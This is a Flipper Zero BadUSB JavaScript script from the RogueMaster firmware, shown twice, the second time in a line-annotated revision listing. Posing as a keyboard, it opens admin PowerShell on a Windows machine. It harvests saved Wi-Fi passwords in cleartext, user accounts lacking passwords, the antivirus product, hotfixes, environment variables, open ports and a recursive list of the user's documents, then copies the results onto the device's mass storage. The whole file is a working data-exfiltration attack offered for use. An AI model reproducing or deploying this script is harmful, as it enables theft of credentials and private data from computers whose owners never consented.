Flipper/Applications/Custom (UL, RM)/RogueMaster/Scripts/BadUSB_Win_Exfil-GSHD.js

// Original: [JS Script: BadUSB_Win_Exfil-GSHD.js (By Gas Station Hot Dog)](https://github.com/User84User/User84PublicUser/blob/main/Windows_Exfil-GSHD.js)
// Updated BadUSB Win Exfil JS Script (By Gas Station Hot Dog & b0r0xZ & mistura.) (Comments added along with more commands)
//MassStorage Name
let image = "/ext/apps_assets/mass_storage/test.img";
//MassStorage Size
let size = 8 * 1024 * 1024;
//Le Script
let script = [
	"$Date = Get-Date -Format yyyy-MM-dd;",//Get Date
	"$Time = Get-Date -Format hh-mm-ss;",//Get Time
	"Get-CimInstance -ClassName Win32_ComputerSystem >> stats.txt;", //Listing computer manufacturer and model
	"Get-LocalUser >> stats.txt;", //List users on the system 
	"Get-LocalUser | Where-Object -Property PasswordRequired -Match false >> stats.txt;", //Which users has password required set to false
	"Get-CimInstance -Namespace root/SecurityCenter2 -ClassName AntivirusProduct >> stats.txt;", // List which AntiVirus Product is being used
	"Get-CimInstance -ClassName Win32_QuickFixEngineering >> stats.txt;", // Listing installed hotfixes
	"(netsh wlan show profiles) | Select-String '\:(.+)$' | %{$name=$_.Matches.Groups[1].Value.Trim(); $_} | %{(netsh wlan show profile name=$name key=clear)}  | Select-String 'Key Content\\W+\\:(.+)$' | %{$pass=$_.Matches.Groups[1].Value.Trim(); $_} | %{[PSCustomObject]@{PROFILE_NAME=$name;PASSWORD=$pass}} | Format-Table -AutoSize >> stats.txt;",//Get network profiles with passwords
	"dir env: >> stats.txt;", //Check ENV
	"Get-Computerinfo >> stats.txt;", //ComputerInfo
	"Get-Service >> stats.txt;", // Get runing services 
	"Get-NetIPAddress -AddressFamily IPv4 | Select-Object IPAddress,SuffixOrigin | where IPAddress -notmatch '(127.0.0.1|169.254.\d+.\d+)' >> stats.txt;", //Check all IPV4 sufix that is not localhost
	"Get-NetTCPConnection | Where-Object -Property State -Match Listen >> stats.txt;", //List listening ports	
	"Get-NetTCPConnection | Select-Object -Property * >> stats.txt;", // Get TCP information, ports, state etc..
	"Get-ChildItem -Path $userDir -Include *.txt, *.doc, *.docx, *.pptx, *.xlsx, *.pdf, *.jpg, *.png, *.mp3, *.mp4, *.zip, *.rar -Recurse >> stats.txt",//Exfil FileNames
];

//Script crawler
let command = "";
for (let i = 0; i < script.length; i++) {
    command += script[i];
}

//Requirements
let badusb = require("badusb");
let usbdisk = require("usbdisk");
let storage = require("storage");

//Check if MassStorage image Exists...
print("Checking for Image...");
if (storage.exists(image)) {
    print ("Storage Exists.");
}
//Create MassStorage in case it doesnt exists
else {
	print ("Creating Storage...");
	usbdisk.createImage(image, size);
}

//VID&PID as HID
badusb.setup({ vid: 0xAAAA, pid: 0xBBBB, mfr_name: "Flipper", prod_name: "Zero" });
print("Waiting for connection");

//Keep Connected
while (!badusb.isConnected()) {
    delay(1000);
}

//Program Start!!
badusb.press("GUI", "x");//Open admin tools menu
delay(300);
badusb.press("i");//Select PowerShell
delay(3000);
//Uncomment this to work with "Run", also comment the 1st part that works with the admin tools menu
/*
badusb.press("GUI", "r");//Open Run
delay(300);
badusb.println("powershell");
badusb.press("ENTER");
*/
print("Running payload");
badusb.println(command, 10);//Run Script Crawler
badusb.press("ENTER");
badusb.println("echo 'Please wait until this Window closes to eject the disk!'; Start-Sleep 10; $DriveLetter = Get-Disk -FriendlyName 'Flipper Mass Storage' | Get-Partition | Get-Volume | Select-Object -ExpandProperty DriveLetter; New-Item -ItemType Directory -Force -Path ${DriveLetter}:\\${Date}\\; Move-Item -Path stats.txt -Destination ${DriveLetter}:\\${Date}\\${env:computername}_${Time}.txt; exit")//Find Disk Partition to save
badusb.press("ENTER");
badusb.quit();
delay(2000);
usbdisk.start(image);//Open MassStorage Folder
print("Please wait until powershell window closes to eject...");

//Ejected check
while (!usbdisk.wasEjected()) {
    delay(1000);
}
//Stop Script
usbdisk.stop();
print("Done");
RM FAP UPDATE 2024-03-25 01:35:38 +00:00			`// Original: [JS Script: BadUSB_Win_Exfil-GSHD.js (By Gas Station Hot Dog)](https://github.com/User84User/User84PublicUser/blob/main/Windows_Exfil-GSHD.js)`
			`// Updated BadUSB Win Exfil JS Script (By Gas Station Hot Dog & b0r0xZ & mistura.) (Comments added along with more commands)`
			`//MassStorage Name`
			`let image = "/ext/apps_assets/mass_storage/test.img";`
			`//MassStorage Size`
			`let size = 8 * 1024 * 1024;`
			`//Le Script`
			`let script = [`
			`"$Date = Get-Date -Format yyyy-MM-dd;",//Get Date`
			`"$Time = Get-Date -Format hh-mm-ss;",//Get Time`
			`"Get-CimInstance -ClassName Win32_ComputerSystem >> stats.txt;", //Listing computer manufacturer and model`
			`"Get-LocalUser >> stats.txt;", //List users on the system`
			`"Get-LocalUser \| Where-Object -Property PasswordRequired -Match false >> stats.txt;", //Which users has password required set to false`
			`"Get-CimInstance -Namespace root/SecurityCenter2 -ClassName AntivirusProduct >> stats.txt;", // List which AntiVirus Product is being used`
			`"Get-CimInstance -ClassName Win32_QuickFixEngineering >> stats.txt;", // Listing installed hotfixes`
			`"(netsh wlan show profiles) \| Select-String '\:(.+)$' \| %{$name=$_.Matches.Groups[1].Value.Trim(); $_} \| %{(netsh wlan show profile name=$name key=clear)} \| Select-String 'Key Content\\W+\\:(.+)$' \| %{$pass=$_.Matches.Groups[1].Value.Trim(); $_} \| %{[PSCustomObject]@{PROFILE_NAME=$name;PASSWORD=$pass}} \| Format-Table -AutoSize >> stats.txt;",//Get network profiles with passwords`
			`"dir env: >> stats.txt;", //Check ENV`
			`"Get-Computerinfo >> stats.txt;", //ComputerInfo`
			`"Get-Service >> stats.txt;", // Get runing services`
			`"Get-NetIPAddress -AddressFamily IPv4 \| Select-Object IPAddress,SuffixOrigin \| where IPAddress -notmatch '(127.0.0.1\|169.254.\d+.\d+)' >> stats.txt;", //Check all IPV4 sufix that is not localhost`
RM FAP UPDATE 2024-04-17 10:33:29 +00:00			`"Get-NetTCPConnection \| Where-Object -Property State -Match Listen >> stats.txt;", //List listening ports`
RM FAP UPDATE 2024-03-25 01:35:38 +00:00			`"Get-NetTCPConnection \| Select-Object -Property * >> stats.txt;", // Get TCP information, ports, state etc..`
			`"Get-ChildItem -Path $userDir -Include .txt, .doc, .docx, .pptx, .xlsx, .pdf, .jpg, .png, .mp3, .mp4, .zip, .rar -Recurse >> stats.txt",//Exfil FileNames`
			`];`

			`//Script crawler`
			`let command = "";`
			`for (let i = 0; i < script.length; i++) {`
			`command += script[i];`
			`}`

			`//Requirements`
			`let badusb = require("badusb");`
			`let usbdisk = require("usbdisk");`
			`let storage = require("storage");`

			`//Check if MassStorage image Exists...`
			`print("Checking for Image...");`
			`if (storage.exists(image)) {`
			`print ("Storage Exists.");`
			`}`
			`//Create MassStorage in case it doesnt exists`
			`else {`
			`print ("Creating Storage...");`
			`usbdisk.createImage(image, size);`
			`}`

			`//VID&PID as HID`
			`badusb.setup({ vid: 0xAAAA, pid: 0xBBBB, mfr_name: "Flipper", prod_name: "Zero" });`
			`print("Waiting for connection");`

			`//Keep Connected`
			`while (!badusb.isConnected()) {`
			`delay(1000);`
			`}`

			`//Program Start!!`
			`badusb.press("GUI", "x");//Open admin tools menu`
			`delay(300);`
			`badusb.press("i");//Select PowerShell`
			`delay(3000);`
			`//Uncomment this to work with "Run", also comment the 1st part that works with the admin tools menu`
			`/*`
			`badusb.press("GUI", "r");//Open Run`
			`delay(300);`
			`badusb.println("powershell");`
			`badusb.press("ENTER");`
			`*/`
			`print("Running payload");`
			`badusb.println(command, 10);//Run Script Crawler`
			`badusb.press("ENTER");`
			`badusb.println("echo 'Please wait until this Window closes to eject the disk!'; Start-Sleep 10; $DriveLetter = Get-Disk -FriendlyName 'Flipper Mass Storage' \| Get-Partition \| Get-Volume \| Select-Object -ExpandProperty DriveLetter; New-Item -ItemType Directory -Force -Path ${DriveLetter}:\\${Date}\\; Move-Item -Path stats.txt -Destination ${DriveLetter}:\\${Date}\\${env:computername}_${Time}.txt; exit")//Find Disk Partition to save`
			`badusb.press("ENTER");`
			`badusb.quit();`
			`delay(2000);`
			`usbdisk.start(image);//Open MassStorage Folder`
			`print("Please wait until powershell window closes to eject...");`

			`//Ejected check`
			`while (!usbdisk.wasEjected()) {`
			`delay(1000);`
			`}`
			`//Stop Script`
			`usbdisk.stop();`
			`print("Done");`